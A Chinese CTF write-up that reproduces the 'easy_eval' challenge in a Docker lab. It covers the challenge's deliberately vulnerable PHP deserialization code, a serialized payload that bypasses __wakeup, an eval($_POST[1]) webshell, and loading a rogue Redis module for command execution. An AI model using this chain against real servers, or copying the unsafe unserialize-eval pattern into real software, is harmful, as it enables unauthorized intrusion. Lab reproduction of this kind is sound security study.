天翼杯easy_eval复现

最近打了很多比赛，很多题没有做出来。所以决定复现一下某些题目。

本地环境的搭建

本地环境涉及到php的web服务、redis数据库。

Dockerfile的编写

FROM ubuntu:16.04

COPY src/sources.list /etc/apt/sources.list
COPY src/redis-4.0.9 /home/redis-4.0.9

RUN apt-get update && \
    apt-get install -y curl \
            software-properties-common \
            python3-software-properties \
            python-software-properties \
            unzip \
            vim

RUN apt-get install -y apache2
RUN service apache2 restart

RUN locale -a
RUN export LANG=C.UTF-8 && \
    add-apt-repository ppa:ondrej/php && \
    apt-get update

RUN apt-get install -y libapache2-mod-php7.0 \
                        libzend-framework-php \
                        php7.0-cli \
                        php7.0 \
                        php7.0-bcmath \
                        php7.0-bz2 \
                        php7.0-cgi \
                        php7.0-common \
                        php7.0-fpm \
                        php7.0-gmp \
                        php-http \
                        php-imagick \
                        php7.0-intl \
                        php7.0-json \
                        php7.0-mbstring \
                        php-memcache \
                        php-memcached \
                        php7.0-mysql \
                        php7.0-recode \
                        php7.0-gd \
                        php7.0-mcrypt \
                        php7.0-xml \
                        php7.0-pdo \
                        php7.0-opcache \
                        php7.0-curl \
                        php7.0-zip

RUN apt install -y gcc \
		   make

RUN cd /home/redis-4.0.9 &&\
    cp -r /home/redis-4.0.9 /usr/local/redis &&\
    cd /usr/local/redis	&&\
    make && make PREFIX=/usr/local/redis install &&\
    export REDIS_HOME=/usr/local/redis &&\
    export PATH=$PATH:$REDIS_HOME/bin


COPY src /tmp/src
RUN mv /tmp/src/web.ini /etc/php/7.0/apache2/conf.d/php.ini &&\
    rm -rf /var/www/html &&\
    mv /tmp/src/html /var/www/html &&\
    mv /tmp/src/start.sh /start.sh &&\
    chmod +x /start.sh

EXPOSE 80

CMD ["/start.sh"]

按照流程编写docker-compose.yml文件，并将相应的文件放到src目录下

其中web.ini就是php的配置文件，可以在里面设置disable_function等。至此，题目基本搭建完成。

反序列化执行eval语句

访问web服务，看到如下php代码

<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);    
    }


}else{
    highlight_file(__FILE__);
}

这里需要触发A类里面的eval函数，才可以进行命令执行。通过unserialize反序列化，触发__destruct函数。由于这里的destruct函数可以将$this->a作为对象来执行a()函数，所以这里可以触发 __call方法。但需要注意的是__wakeup函数会在这个类初始化之前触发。如果等这个函数触发之后，再去执行我们得call方法，那么code变量就是一个空字符串了，无法达到我们想要的效果。

绕过wakeup,需要属性数量和实际属性数量不相同。同样这里有正则

    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }

如果按照以下方式编写payload是无法通过正则的

<?php
class A{
    public $code = 'phpinfo();';
}
class B{
    public $a;
}

$b = new B();
$b->a = new A();
echo serialize($b);

这里要求A或B这两个字符后面跟随的数字是1,否则就会退出程序。

这里只需要在B这个类的后面再添加一个属性，这样B的属性数量变为2，反序列化时将B的属性数量改为1，即可绕过wakeup函数。

这样一来，就成功执行phpinfo函数。

redis加载恶意so文件

将上面的phpinfo();函数改为一句话木马eval($_POST[1]);使用蚁剑连接

接下来使用数据操作功能连接上redis

可以看到版本号是4.0.9，使用https://github.com/Dliv3/redis-rogue-server上的so文件。redis加载该文件，即可完成命令执行，访问到被限制访问的文件。